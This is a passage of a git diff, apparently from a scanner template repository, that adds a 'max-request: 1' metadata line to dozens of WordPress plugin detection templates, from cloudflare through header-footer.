+ max-request: 1
plugin_namespace: click-to-chat-for-whatsapp
wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml
index e555bf93d3..425adf0bfe 100644
--- a/http/technologies/wordpress/plugins/cloudflare.yaml
+++ b/http/technologies/wordpress/plugins/cloudflare.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/cloudflare/
metadata:
+ max-request: 1
plugin_namespace: cloudflare
wpscan: https://wpscan.com/plugin/cloudflare
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index c3b630cde2..1fad3cee08 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/cmb2/
metadata:
+ max-request: 1
plugin_namespace: cmb2
wpscan: https://wpscan.com/plugin/cmb2
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index 5c8ce709b6..ebe4ee41a7 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/coblocks/
metadata:
+ max-request: 1
plugin_namespace: coblocks
wpscan: https://wpscan.com/plugin/coblocks
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index aea47b9e84..5c32110e0e 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/code-snippets/
metadata:
+ max-request: 1
plugin_namespace: code-snippets
wpscan: https://wpscan.com/plugin/code-snippets
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 78c584c388..09c2e2f360 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/coming-soon/
metadata:
+ max-request: 1
plugin_namespace: coming-soon
wpscan: https://wpscan.com/plugin/coming-soon
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 2c80d09c27..1a2e8beb3e 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/complianz-gdpr/
metadata:
+ max-request: 1
plugin_namespace: complianz-gdpr
wpscan: https://wpscan.com/plugin/complianz-gdpr
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 4b1b3a8754..706145493c 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-7-honeypot/
metadata:
+ max-request: 1
plugin_namespace: contact-form-7-honeypot
wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index 06ad83bdf7..cf6a6ee635 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-7/
metadata:
+ max-request: 1
plugin_namespace: contact-form-7
wpscan: https://wpscan.com/plugin/contact-form-7
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index b20666268f..c039765929 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-cfdb7/
metadata:
+ max-request: 1
plugin_namespace: contact-form-cfdb7
wpscan: https://wpscan.com/plugin/contact-form-cfdb7
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index b2a097bfe7..a2c92dff4b 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/cookie-law-info/
metadata:
+ max-request: 1
plugin_namespace: cookie-law-info
wpscan: https://wpscan.com/plugin/cookie-law-info
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index c71fa258af..41b5d6c854 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/cookie-notice/
metadata:
+ max-request: 1
plugin_namespace: cookie-notice
wpscan: https://wpscan.com/plugin/cookie-notice
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index 5a98e67597..cca31cc3a9 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/creame-whatsapp-me/
metadata:
+ max-request: 1
plugin_namespace: creame-whatsapp-me
wpscan: https://wpscan.com/plugin/creame-whatsapp-me
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index 4463174203..ff9c0a49ce 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/creative-mail-by-constant-contact/
metadata:
+ max-request: 1
plugin_namespace: creative-mail-by-constant-contact
wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index cfac0b961b..a76d3306bb 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/custom-css-js/
metadata:
+ max-request: 1
plugin_namespace: custom-css-js
wpscan: https://wpscan.com/plugin/custom-css-js
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 814e603d75..d6200aaea4 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/custom-fonts/
metadata:
+ max-request: 1
plugin_namespace: custom-fonts
wpscan: https://wpscan.com/plugin/custom-fonts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index 0def6e61ca..b5389b27c9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/custom-post-type-ui/
metadata:
+ max-request: 1
plugin_namespace: custom-post-type-ui
wpscan: https://wpscan.com/plugin/custom-post-type-ui
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 5c5decc127..00d183f507 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/disable-comments/
metadata:
+ max-request: 1
plugin_namespace: disable-comments
wpscan: https://wpscan.com/plugin/disable-comments
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index a8229a338e..451e1daef1 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/disable-gutenberg/
metadata:
+ max-request: 1
plugin_namespace: disable-gutenberg
wpscan: https://wpscan.com/plugin/disable-gutenberg
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index 6559e64dce..af30ca76b6 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/duplicate-page/
metadata:
+ max-request: 1
plugin_namespace: duplicate-page
wpscan: https://wpscan.com/plugin/duplicate-page
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index a4368b8aa6..93823466d4 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/duplicate-post/
metadata:
+ max-request: 1
plugin_namespace: duplicate-post
wpscan: https://wpscan.com/plugin/duplicate-post
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index ec119e762a..e224283ecd 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/duplicator/
metadata:
+ max-request: 1
plugin_namespace: duplicator
wpscan: https://wpscan.com/plugin/duplicator
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index b7ec7576a3..9af8df08a7 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/duracelltomi-google-tag-manager/
metadata:
+ max-request: 1
plugin_namespace: duracelltomi-google-tag-manager
wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index c42d679973..d4081474c3 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/easy-fancybox/
metadata:
+ max-request: 1
plugin_namespace: easy-fancybox
wpscan: https://wpscan.com/plugin/easy-fancybox
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-google-fonts.yaml b/http/technologies/wordpress/plugins/easy-google-fonts.yaml
index c9859e9770..96c813ad49 100644
--- a/http/technologies/wordpress/plugins/easy-google-fonts.yaml
+++ b/http/technologies/wordpress/plugins/easy-google-fonts.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/easy-google-fonts/
metadata:
+ max-request: 1
plugin_namespace: easy-google-fonts
wpscan: https://wpscan.com/plugin/easy-google-fonts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index fc44375947..bcbc0707fb 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/easy-table-of-contents/
metadata:
+ max-request: 1
plugin_namespace: easy-table-of-contents
wpscan: https://wpscan.com/plugin/easy-table-of-contents
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index a1616c1741..8b23832297 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/easy-wp-smtp/
metadata:
+ max-request: 1
plugin_namespace: easy-wp-smtp
wpscan: https://wpscan.com/plugin/easy-wp-smtp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index 6cfb8bc272..f0c3e4bc63 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/elementor/
metadata:
+ max-request: 1
plugin_namespace: elementor
wpscan: https://wpscan.com/plugin/elementor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index 9caaa53263..eab4a0d725 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/elementskit-lite/
metadata:
+ max-request: 1
plugin_namespace: elementskit-lite
wpscan: https://wpscan.com/plugin/elementskit-lite
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 5e6b557952..74c172ac94 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/enable-media-replace/
metadata:
+ max-request: 1
plugin_namespace: enable-media-replace
wpscan: https://wpscan.com/plugin/enable-media-replace
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index c5a665e6f7..f5a63a2ed2 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/envato-elements/
metadata:
+ max-request: 1
plugin_namespace: envato-elements
wpscan: https://wpscan.com/plugin/envato-elements
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index a8b56b5df0..25ca7328ef 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/essential-addons-for-elementor-lite/
metadata:
+ max-request: 1
plugin_namespace: essential-addons-for-elementor-lite
wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index 4e20e57107..cb1db5bee6 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/ewww-image-optimizer/
metadata:
+ max-request: 1
plugin_namespace: ewww-image-optimizer
wpscan: https://wpscan.com/plugin/ewww-image-optimizer
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index 6f6a416595..a3207ea16a 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/facebook-for-woocommerce/
metadata:
+ max-request: 1
plugin_namespace: facebook-for-woocommerce
wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2dd0ef57b5..2a4b772078 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/fast-indexing-api/
metadata:
+ max-request: 1
plugin_namespace: fast-indexing-api
wpscan: https://wpscan.com/plugin/fast-indexing-api
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 11942f4fa4..366205085d 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/favicon-by-realfavicongenerator/
metadata:
+ max-request: 1
plugin_namespace: favicon-by-realfavicongenerator
wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 87c2aeb4bd..598f08ce88 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/flamingo/
metadata:
+ max-request: 1
plugin_namespace: flamingo
wpscan: https://wpscan.com/plugin/flamingo
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 3696eefbf7..42cdfb4475 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/fluentform/
metadata:
+ max-request: 1
plugin_namespace: fluentform
wpscan: https://wpscan.com/plugin/fluentform
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index 8bab0a9c3e..a1af263dbd 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/font-awesome/
metadata:
+ max-request: 1
plugin_namespace: font-awesome
wpscan: https://wpscan.com/plugin/font-awesome
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index affd270123..19265f910e 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/force-regenerate-thumbnails/
metadata:
+ max-request: 1
plugin_namespace: force-regenerate-thumbnails
wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index 1e6a62e23b..c21d414695 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/formidable/
metadata:
+ max-request: 1
plugin_namespace: formidable
wpscan: https://wpscan.com/plugin/formidable
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 980265f531..91c89d0ad8 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/forminator/
metadata:
+ max-request: 1
plugin_namespace: forminator
wpscan: https://wpscan.com/plugin/forminator
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index daf205789d..539d9f7cec 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/ga-google-analytics/
metadata:
+ max-request: 1
plugin_namespace: ga-google-analytics
wpscan: https://wpscan.com/plugin/ga-google-analytics
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index 22bfa3ffe2..f4123bb594 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/gdpr-cookie-compliance/
metadata:
+ max-request: 1
plugin_namespace: gdpr-cookie-compliance
wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 88d38e21ed..23a88ea130 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
metadata:
+ max-request: 1
plugin_namespace: google-analytics-dashboard-for-wp
wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index ad238445fc..8074ac337e 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/google-analytics-for-wordpress/
metadata:
+ max-request: 1
plugin_namespace: google-analytics-for-wordpress
wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 840c086fb9..575c9ebe67 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/google-listings-and-ads/
metadata:
+ max-request: 1
plugin_namespace: google-listings-and-ads
wpscan: https://wpscan.com/plugin/google-listings-and-ads
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 2678f603c6..7b0f188ff7 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/google-site-kit/
metadata:
+ max-request: 1
plugin_namespace: google-site-kit
wpscan: https://wpscan.com/plugin/google-site-kit
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 20d947a5d1..898e4de56d 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/google-sitemap-generator/
metadata:
+ max-request: 1
plugin_namespace: google-sitemap-generator
wpscan: https://wpscan.com/plugin/google-sitemap-generator
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 22ee97b51f..4a76856a69 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/gtranslate/
metadata:
+ max-request: 1
plugin_namespace: gtranslate
wpscan: https://wpscan.com/plugin/gtranslate
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index 3f4c6c8936..b321ca63eb 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/gutenberg/
metadata:
+ max-request: 1
plugin_namespace: gutenberg
wpscan: https://wpscan.com/plugin/gutenberg
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index fa1bb64115..2b42c9f80c 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/happy-elementor-addons/
metadata:
+ max-request: 1
plugin_namespace: happy-elementor-addons
wpscan: https://wpscan.com/plugin/happy-elementor-addons
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
index a8eca7b056..2409c6b370 100644
--- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
+++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/header-and-footer-scripts/
metadata:
+ max-request: 1
plugin_namespace: header-and-footer-scripts
wpscan: https://wpscan.com/plugin/header-and-footer-scripts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index da63d1cbf6..dbea07a6da 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/header-footer-code-manager/
metadata:
+ max-request: 1
plugin_namespace: header-footer-code-manager
wpscan: https://wpscan.com/plugin/header-footer-code-manager
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index f94e7f6494..17a8f220cf 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/header-footer-elementor/
metadata:
+ max-request: 1
plugin_namespace: header-footer-elementor
wpscan: https://wpscan.com/plugin/header-footer-elementor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
